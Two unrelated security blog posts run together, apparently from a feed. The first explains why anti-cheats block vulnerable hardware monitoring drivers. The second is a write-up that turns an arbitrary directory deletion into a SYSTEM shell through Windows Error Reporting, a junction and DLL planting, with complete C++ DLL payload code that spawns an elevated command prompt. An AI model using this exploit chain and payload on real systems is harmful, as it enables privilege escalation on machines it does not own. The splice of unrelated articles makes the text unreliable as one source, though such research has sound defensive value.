This is a brief informational piece for the readers that don’t come from a deep technical background regarding cheats/anti-cheats/drivers or related. It’s come to our attention that many people are wondering why certain anti-cheats block or log when a player has overclocking/tuning software open. I’ll start off by explaining why these types of software require drivers, then show a few examples of why they’re dangerous and provide information about the dangerous recycling of code that makes the end-user vulnerable. Recycling code out of convenience at the risk of your end-users is a lazy decision that can result in damage to your system. In this case, the code is recycled from sites like kernelmode.info, OSR Online, and so on. The drivers that are used by this software are particularly problematic and would be the first targets I’d look for if I was looking to exploit a large population of people - gamers and tech enthusiasts would be a good crowd because of the tools presented below. This is by no means an exhaustive list, I’m only addressing a few drivers that are/have been exploited in cheating communities. There are dozens if not hundreds in the wild. Let’s cover the reasoning for a driver with these types of software.

Notice: We are not affiliated with game publishers or anti-cheat vendors, paid or otherwise.

Driver Requirements

Hardware monitoring/overclocking tools have been rising in popularity in the last half-decade with the growth in professional gaming, and technical requirements to run certain games. These tools query various system components like GPU, CPU, thermal sensors, and so on, however, this information isn’t easily acquired by a user. For example, to query the on-die digital temperature sensor to get temperature data for the CPU an application would need to perform a read on a model-specific register. These model-specific registers and the intrinsics to read/write them are only available when operating at a higher privilege level such as ring-0 (where drivers operate.) A model-specific register (MSR) is a type of register that is part of the x86 instruction set. As the name suggests, some registers are present on certain processors while others are not - making them model-specific. They’re primarily used for storing platform specific information, and CPU feature information; they can also be used in performance monitoring or thermal sensor monitoring. Intel decided to provide two instructions in the x86 ISA that allowed for privileged software (operating system or otherwise) to read or write model-specific registers. The instructions are rdmsr and wrmsr, and allow a privileged actor to modify or query the state of one of these registers. There is an extensive list of MSRs that are available for Intel and AMD processors that can be found in their respective SDM/APM. The significance of this is that much of the information in these MSRs should not be modified by any tasks privileged or not. There is rarely a need to do so even when writing device drivers.

Many drivers for hardware monitoring software allow an unprivileged task (in terms of privilege level, excluding Admin requirements) to read/write arbitrary MSRs. How does that work? Well, the drivers must have a mode of communication available so that they can read privileged data from an unprivileged application, and these drivers provide that interface. It’s important to reiterate that the majority of hardware monitoring/overclocking drivers that come packaged with the client application have much more, albeit unnecessary, functionality available through this communication protocol. The client application, let’s say the CPUZ desktop application, uses a Windows API function named DeviceIoControl. In the simplest sense, CPUZ calls DeviceIoControl with an IO control code that is known to the developers to perform a read of an MSR like the on-die digital temperature sensor. This isn’t an inherently dangerous thing. What’s problematic is that these drivers implement additional functionality that is outside the scope of the software and expose it through this same interface - like writing to MSRs, or physical memory.

So, if only the developers know the codes then why is it an issue? Reverse engineering is a fruitful endeavor. All an attacker has to do is get a copy of the driver, load it into their desired disassembler like IDA Pro, and look for the IOCTL handler. This is an IOCTL code in the CPUZ driver which is used to send 2 bytes out 2 different I/O ports - 0xB2 (broadcast SMI) and 0x84 (output port 4). This is interesting because you can force SMI using port 0xB2 which allows entry to System Management Mode. However, this doesn’t really accomplish anything significant it’s just interesting to note. The SMI port is primarily used for debugging.

Now, let’s take a look at a driver, shipped from Intel, that allows every operation an attacker could dream of.

Undisclosed Intel driver

This driver was packaged with a diagnostic tool created by Intel. It allows for many different operations, the most problematic is the ability for an unprivileged application to write directly to a memory page in physical memory.

Note: Unprivileged application meaning an application running at a low privilege level (ring-3), despite the requirement of Admin rights to carry out the DeviceIoControl request.

Among other things, it allows direct port IO (which is supposed to be a privileged operation) which can be abused to cause all sorts of issues on a target machine. From a malicious actor, it could be used to perform a denial-of-service by writing to an IO port that can be used to hard reset the processor.

As a diagnostic tool from Intel, the operations make some sense. However, this is a signed driver associated with a public tool and in the wrong hands could be abused to wreak havoc, in this case, on a game. The ability to read and write physical memory means that an attacker can access a game’s memory without having to do traditional things like open a handle to the process and use Windows APIs to assist in reading the virtual memory. It’s a bit of work for the attacker, but that’s never stopped any motivated individual. Well, I don’t use this diagnostic tool - so who cares? Take a look at the next two tools that use vulnerable drivers.

HWMonitor

I’ve seen it mentioned before around different communities for overclocking, general diagnostics, and for people that don’t have enough fans in their case to prevent them from overheating. This tool carries a driver that is also quite problematic with the functionality provided. The screenshot below shows a different method of reading a portion of physical memory via MmMapIoSpace. This would be useful for an attacker to use against a game under the guise of being a trusted hardware monitoring tool. What about writing to those model-specific registers? This tool has no business writing to any MSRs yet exposes a control case where the right code allows a user to write to any model-specific register. Here’s two images of different IOCTL blocks in HWMonitor.

As a bonus, the driver that HWMonitor uses is also the driver the CPUZ uses! If an anti-cheat were to simply block HWMonitor - the application - from running the attacker could simply pull up CPUZ and have the same capabilities. This is an issue because, as mentioned earlier, model-specific registers are meant to be read/written to by system software. Exposing these registers to the user through any sort of unchecked interface gives an attacker the ability to modify system data they should otherwise not have access to. It allows attackers to circumvent protections that may be put in place by a third-party such as an anti-cheat. An anti-cheat can register callbacks such as the ExCbSeImageVerificationDriverInfo which allows the driver to get information about a loaded driver. Utilizing a trusted driver lets the attackers go undetected. Many personally signed drivers are logged/flagged/dumped by some anti-cheats and certain ones that are WHQL or from a vendor like Intel are inherently trusted. This callback is also one method anti-cheats use to prevent drivers, like the packaged driver for CPUZ, from loading; or just noting that they are present even if the name of the driver is modified.

MSI Afterburner

At this point, it’s probably clear why many of these drivers are blocked from loading by anti-cheat software. I’ll let this exploit-db page speak for MSI Afterburner. It’s just as bad as the aforementioned drivers and to preserve the integrity of the system and game it’s reasonable for anti-cheats to prevent it from loading.

These vulnerabilities have since been patched, this is merely an example of the type of behavior in many tools. While MSI responded appropriately and updated Afterburner, not all OC/monitoring tools have been updated.

Conclusion

It should make sense now, regardless of how unfortunate, why some anti-cheats prevent the loading of these types of drivers. I’ve seen various arguments against this tactic, but in the end, the anti-cheats job is to protect the integrity of the game and maximize the quality of gameplay. If that means you can’t run your hardware monitoring tool then you’re just going to have to shut it off to play. Cheaters in games have been using these drivers since late 2015/2016, and maybe even before that (however, the first PoC wasn’t public on a large cheating forum before then). Blocking them is necessary to ensure that the anti-cheat is not being tampered with through a trusted third-party driver and that the game is protected from hackers using this method of attack. It’s understandable that being unable to use monitoring tools is frustrating, but rather than blame the anti-cheat blame the vendors of these types of software that are recycling dangerous code and putting your system at risk regardless of the game you play. If I were an attacker, I would definitely consider using one of these many drivers to compromise a system.

A solution for some of the companies would be to simply remove the unnecessary code like mapping physical memory, writing to model-specific registers, writing to control registers, and so on. Maintaining the read-only of thermal sensors and other component related data would be much less of an issue.

This is by no means an extensive article, just a brief information piece to help players/users understand why their hardware monitoring/overclocking tools are blocked by an anti-cheat.

From directory deletion to SYSTEM shell

By: Jonas L
23 April 2020 at 23:00

Vulnerabilities that enable an unprivileged profile to make a service (that is running in the SYSTEM security context) delete an arbitrary directory/file are not a rare occurrence. These vulnerabilities are mostly ignored by security researchers on the hunt as there is no established path to escalation of privilege using such a primitive technique. By chance I have found such a path using an unlikely quirk in the Windows Error Reporting Service. The technical details are neither brilliant nor novel, though a writeup has been requested by several Twitter users.

Windows Error Reporting Service (WER) is responsible for collecting telemetry data when an application crashes. Over time, many vulnerabilities have been discovered in WER and if you want to find a rare specimen, it is the first place to look for it. The service is split into a usermode component and service component that communicates via COM over ALPC. Error reports are created, queued, and delivered using the file system as temporary storage.

The files are stored in subfolders at C:\ProgramData\Microsoft\Windows\WER.

  • Temp is used to store collected crash data from various sources, before they’re merged into a single file.
  • ReportQueue is used when a report is ready for delivery to Microsoft’s servers. If delivery is not possible due to throttling or missing internet connection, delivery will be attempted later and delivered when conditions allow it.
  • ReportArchive is a historic archive of delivered reports.

The NTFS permissions for the folders are chosen to allow any crashing application to deliver its data to Microsoft. Crash-specific files and folders created in subfolders may have more restrictive permissions depending on the security context of the crashed application.

The default permissions for the root folder are:

C:\ProgramData\Microsoft\Windows\WER NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                     BUILTIN\Administrators:(I)(OI)(CI)(F)
                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                     Everyone:(I)(OI)(CI)(RX)

And the subfolders:

C:\ProgramData\Microsoft\Windows\WER\ReportArchive BUILTIN\Administrators:(F)
                                                   BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                   NT AUTHORITY\SYSTEM:(F)
                                                   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                   NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\ReportQueue BUILTIN\Administrators:(F)
                                                 BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                 NT AUTHORITY\SYSTEM:(F)
                                                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                 NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\Temp BUILTIN\Administrators:(OI)(CI)(F)
                                          NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

The root cause enabling an arbitrary privileged directory deletion to be used for escalation of privileges is a surprising logical flow in WER. If the root folder doesn’t exist when needed for report creation it will be created - nothing surprising here. What is surprising however, is that the folder is created with the following permissions:

C:\ProgramData\Microsoft\Windows\WER BUILTIN\Administrators:(OI)(CI)(F)
                                     NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

The new permissions make it possible to make the root folder into a junction folder by an unprivileged profile. This is a scenario the service was not programmed to account for. However, even if we have a vulnerability that deletes the directory in SYSTEM security context, it would not help us much as the directory is not empty. Emptying the directory may immediately appear as impossible when the ReportArchive folder contains files owned by System with restrictive permissions, as it is often the case. But that is actually not a problem at all. What we need is the DELETE permission on the parent folder. The permissions on child files and folders are irrelevant.

A little known NTFS detail is that the rename operation can be used to move files and folders anywhere on the volume. A rename operation requires the DELETE permission on the origin and the FILE_ADD_FILE/FILE_ADD_SUBDIRECTORY permission on the destination folder. By moving all subfolders of C:\ProgramData\Microsoft\Windows\WER into another writeable location, such as C:\Windows\Temp, we bypass any restrictions on files inside the subfolders. Now the arbitrary directory delete vulnerability can be used on C:\ProgramData\Microsoft\Windows\WER with success. If the vulnerability only enables deletion of a file because NtCreateFile is called with FILE_NON_DIRECTORY_FILE, that restriction can be bypassed by making it open the path C:\ProgramData\Microsoft\Windows\WER::$INDEX_ALLOCATION.

When the folder is gone the next step is to make the WER service recreate it. That can be done by triggering the task \Microsoft\Windows\Windows Error Reporting\QueueReporting. The task is triggerable by an unprivileged profile, but executes as SYSTEM. After the task has completed we see the new, more permissive folder, but we also see the subfolders are recreated as well. To use our new FILE_WRITE_ATTRIBUTES permission on the recreated folder for making it into a junction folder, we must first make it empty (or not… but that is subject for another writeup). We repeat the move operations on the subdirectories as previously and now we can create our junction folder.

By having the junction point target the \??\c:\windows\system32\wermgr.exe.local folder, the error reporting service will create the target folder with the same permissive ACL. Every execution of wermgr.exe attempts to open the wermgr.exe.local folder, and if opened it will have the highest priority when locating ‘Side By Side (SxS)’ DLL files. If the .local folder exists, the subfolder amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.778_none_e6c6b761130d4fb8 is then attempted to be opened, and if successful Comctl32.dll is loaded from it. By crafting a payload DLL and planting it in the amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.778_none_e6c6b761130d4fb8 folder with the name comctl32.dll, it will get loaded by the LoadLibrary function in the SYSTEM security context next time the WER service starts.

When a DLL file is loaded with LoadLibrary its DllMain function gets executed by the loading process with argument ul_reason_for_call having value DLL_PROCESS_ATTACH. Continued functionality of the loading process is not a priority in this scenario. We just want to detach from the process and execute code in our own process. By spawning a command prompt we can provide visual indication of successful execution. It also enables usage of the escalated privileges as the command prompt inherits the escalated privileges. Most importantly, it detaches execution from the error reporting service so the command prompt will continue running even if the service terminates!

There is an obstacle for launching the command prompt though. The service is running in session 0. Processes running in session 0 can not create objects on the desktop, only processes in session 1 (by default) can do that.

To launch the command prompt in the current active session we can retreive the active session number using the WTSGetActiveConsoleSessionId() function. Launching the prompt can be done with the following code:


bool spawnShell() 
{
   STARTUPINFO startInfo = { 0x00 };
   startInfo.cb = sizeof(startInfo);
   startInfo.wShowWindow = SW_SHOW;
   startInfo.lpDesktop = const_cast<wchar_t*>( L"WinSta0\\Default" );

   PROCESS_INFORMATION procInfo = { 0x00 };

   HANDLE hToken = {};
   DWORD  sessionId = WTSGetActiveConsoleSessionId();

   OpenProcessToken( GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken );
   DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, &hToken );

   SetTokenInformation(hToken, TokenSessionId, &sessionId, sizeof(sessionId));

   if (  CreateProcessAsUser( hToken,
            expandPath(L"%WINDIR%\\system32\\cmd.exe").c_str(),
            const_cast<wchar_t*>( L"" ),
            nullptr,
            nullptr,
            FALSE,
            NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
            nullptr,
            nullptr,
            &startInfo,
            &procInfo
         ) 
      )  {
            CloseHandle(procInfo.hProcess);
            CloseHandle(procInfo.hThread);
         }

   return true;
}

The function opens the token of the current process (the service) and duplicates as a primary token (It already is, but we have to choose). The duplicated tokens session ID is then changed to the ID returned by WTSGetActiveConsoleSessionId(). By using the altered token to launch the command prompt, we get the security context of the service and execution in our session.

In my default payload, there are some extra things I like to do. Things that helps when the dll executes under more restrictive permissions. If the service is running as Local Service profile we do not have permission to change to the users session. Therefore I use the function WTSSendMessage() to create a dialog box on the active sessions desktop. That function works even when all other possibilities for creating anything on the desktop is impossible. The displayed data is also logged in the event viewer. I like to display the name of the profile we are executing as, the filename the dll is loaded as, and the the filename of the loading process. Sometimes a shell pops up because I planted a dll months before and by chance certain conditions are created where the dll gets loaded. In such cases that information is invalueable because, if the service terminates before I get a look at it, investigating why that shell popped is nearly impossible. I also like to make some beeps. Then even if everything is hidden because the computer is locked, I still get an indication that my payload executes and I can look in the event log.

One way to implement the mentioned functionality is:

#include <filesystem>   
#include <wtsapi32.h>
#include <Lmcons.h>
#include <iostream>
#include <string>
#include <Windows.h>
#include <wtsapi32.h>

#pragma comment(lib, "Wtsapi32.lib")

using namespace std;

wstring expandPath(const wchar_t* input) {
   wchar_t szEnvPath[MAX_PATH];
   ::ExpandEnvironmentStringsW(input, szEnvPath, MAX_PATH);
   return szEnvPath;
}

auto getUsername() {
   wchar_t usernamebuf[UNLEN + 1];
   DWORD size = UNLEN + 1;
   GetUserName((TCHAR*)usernamebuf, &size);
   static auto username = wstring{ usernamebuf };
   return username;
}

auto getProcessFilename() {
   wchar_t process_filenamebuf[MAX_PATH]{ 0x0000 };
   GetModuleFileName(0, process_filenamebuf, MAX_PATH);
   static auto process_filename = wstring{ process_filenamebuf };
   return process_filename;
}

auto getModuleFilename(HMODULE hModule = nullptr) {
   wchar_t module_filenamebuf[MAX_PATH]{ 0x0000 };
   if(hModule != nullptr) GetModuleFileName(hModule, module_filenamebuf, MAX_PATH);
   static auto module_filename = wstring{ module_filenamebuf };
   return module_filename;
}

bool showMessage() {
   Beep( 4000, 400 );
   Beep( 4000, 400 );
   Beep( 4000, 400 );

   auto m = L"This file:\n"s + getModuleFilename() + L"\nwas loaded by:\n"s + getProcessFilename() + L"\nrunning as:\n" + getUsername() ;
   auto message = (wchar_t*)m.c_str();
   DWORD messageAnswer{};
   WTSSendMessage( WTS_CURRENT_SERVER_HANDLE, WTSGetActiveConsoleSessionId(), (wchar_t*)L"",0 ,message ,lstrlenW(message) * 2,0 ,0 ,&messageAnswer ,true );

   return true;
}
static const auto init = spawnShell();
 
BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved )
{
   getModuleFilename(hModule);
   static auto const msgshown = showMessage();
}

Final execution of the exploit with payload should end up looking like this:

An alternative to using the scheduled task for triggering the report submission flow is to submit an error report using the exported C function in wer.dll. If the report is submitted with the WER_SUBMIT_OUTOFPROCESS flag, the service will handle the operations needed for our purposes instead of the usermode component. Source code for submitting an error report can be seen here

❌
❌